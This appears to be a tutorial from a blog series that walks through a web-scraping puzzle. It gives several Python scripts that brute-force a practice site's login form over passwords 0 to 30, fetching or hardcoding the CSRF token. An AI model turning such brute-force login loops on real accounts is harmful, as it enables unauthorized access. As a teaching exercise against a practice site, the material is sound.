On to challenge two. This puzzle asks you to enter a username and password to log in; the username can be anything, and the password is a number no greater than 30. The challenge page is shown in the figure.
We need some Python web-scraping knowledge here, and there are two ways to solve it.
Approach 1: the requests library plus re regular expressions
1. Use requests to fetch the page
2. Use re regular expressions to match the content
3. The idea is to send requests.post() requests inside a for loop that tries every password from 0 to 30.
After entering an arbitrary username and password, find the POST request in the F12 developer console, as shown in the figure below.
In this request's Form Data, the value of csrfmiddlewaretoken is fixed at nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F; it does not change with the username and password you enter, so Code 1 below works.
If the csrfmiddlewaretoken value in Form Data did change, you could write a function to read it from the Cookie, as in Code 2.
The code is as follows.
Code 1: the csrfmiddlewaretoken value in Form Data is fixed
import requests
import re

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                         "Chrome/68.0.3440.106 Safari/537.36"}


def attack(password):
    url = "http://www.heibanke.com/lesson/crawler_ex01/"
    data = {
        "csrfmiddlewaretoken": "nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F",  # fixed token captured in F12
        "username": "admin",
        "password": password,
    }
    response = requests.post(url, headers=headers, data=data)
    # The result message is inside the page's <h3> tag
    html = re.findall(r'<h3>(.*?)</h3>', response.text)
    print(html[0])


def main():
    for password in range(31):  # try every password from 0 to 30
        print(password)
        attack(password)


main()
Code 2: the csrfmiddlewaretoken value in Form Data changes (this code also works when it is fixed)
import requests
import re

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
}


def get_csrf():
    # GET the page first; the server sets a csrftoken cookie in the response headers
    url = 'http://www.heibanke.com/lesson/crawler_ex01/'
    response = requests.get(url, headers=headers)
    response = str(response.headers)
    csrf = re.findall('csrftoken=(.*?);', response)
    return csrf[0]


def attack(csrf, password):
    data = {
        "csrfmiddlewaretoken": csrf,
        "username": "admin",
        "password": password,
    }
    url = 'http://www.heibanke.com/lesson/crawler_ex01/'
    response = requests.post(url, headers=headers, data=data).text
    info = re.findall('<h3>(.*?)</h3>', response)
    print(info[0])


def main():
    csrf = get_csrf()
    for password in range(31):
        print(password)
        attack(csrf, password)


main()
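A variant worth knowing: a requests.Session carries the csrftoken cookie from the first GET into every later POST automatically, so you never parse headers by hand. The sketch below assumes the same URL and form fields as Code 2; the helper name extract_csrf and the commented usage are my own illustration, not part of the original solution.

```python
import re

URL = "http://www.heibanke.com/lesson/crawler_ex01/"  # endpoint used throughout this post


def extract_csrf(set_cookie_header):
    """Pull the csrftoken value out of a Set-Cookie style header string."""
    match = re.search(r"csrftoken=([^;]+)", set_cookie_header)
    return match.group(1) if match else None


def brute_force(session, max_password=30):
    """Try every password; the session resends the csrftoken cookie by itself."""
    for password in range(max_password + 1):
        data = {
            "csrfmiddlewaretoken": session.cookies.get("csrftoken"),
            "username": "admin",
            "password": password,
        }
        text = session.post(URL, data=data).text
        msg = re.findall(r"<h3>(.*?)</h3>", text)
        print(password, msg[0] if msg else "")


# Usage (hits the network, so it is not executed here):
# import requests
# with requests.Session() as session:
#     session.get(URL)   # the first GET sets the csrftoken cookie
#     brute_force(session)
```

The session approach also works when the token is fixed, so it subsumes both Code 1 and Code 2.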
The output is shown below; the correct password appears in it.
Approach 2: the urllib.request, http.cookiejar, and bs4 libraries
The code is as follows.
import urllib.request
import urllib.parse
import http.cookiejar
from bs4 import BeautifulSoup

url = "http://www.heibanke.com/lesson/crawler_ex01/"

# Install a cookie-aware opener so the csrftoken cookie from the first GET
# is sent back automatically with every later request
cj = http.cookiejar.LWPCookieJar()
cookie_support = urllib.request.HTTPCookieProcessor(cj)
opener = urllib.request.build_opener(cookie_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)

data = urllib.request.urlopen(url).read()
data = data.decode('utf-8')

# headers and postData come from packet capture (F12)
headers = {
    'Accept': 'text/html, application/xhtml+xml, image/jxr',
    'Referer': 'http://www.heibanke.com/lesson/crawler_ex01/',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'
}

password = 0
while True:
    postData = {
        'csrfmiddlewaretoken': 'sczCT2OaFZ5BAxTXR0rBNSFuqummuY2y',
        'username': 'admin',
        'password': password
    }
    # Encode the form data; without this, urlopen raises
    # "POST data should be bytes or an iterable of bytes. It cannot be str."
    postData = urllib.parse.urlencode(postData)
    postData = postData.encode('utf-8')

    req = urllib.request.Request(url, postData, headers)
    response = urllib.request.urlopen(req)
    text = response.read().decode('utf-8')

    # The result message is inside the page's <h3> tag
    soup = BeautifulSoup(text, "lxml")
    msg = soup.body.h3.string
    if msg == "您输入的密码错误, 请重新输入":  # "wrong password, try again"
        password += 1
        continue
    else:
        print(msg)
        print("password is : " + str(password))
        break
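Note that Approach 2 installs a cookie jar yet still hardcodes the csrfmiddlewaretoken. Since the first urlopen(url) stores the server's csrftoken cookie in cj, the token could instead be read from the jar. A minimal sketch of that idea follows; the helper name token_from_jar is my own, not from the original post.

```python
import http.cookiejar


def token_from_jar(jar):
    """Return the value of the csrftoken cookie stored in a cookiejar, if any."""
    for cookie in jar:
        if cookie.name == "csrftoken":
            return cookie.value
    return None


# In the code above this would replace the hardcoded token:
# postData['csrfmiddlewaretoken'] = token_from_jar(cj)
```

This keeps the script working even when the server rotates the token between sessions.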
The output is shown below; it reveals the password.
Click the link https://blog.csdn.net/Ljt101222/article/details/82428351 to continue to Python 黑板客爬虫闯关三 (challenge three).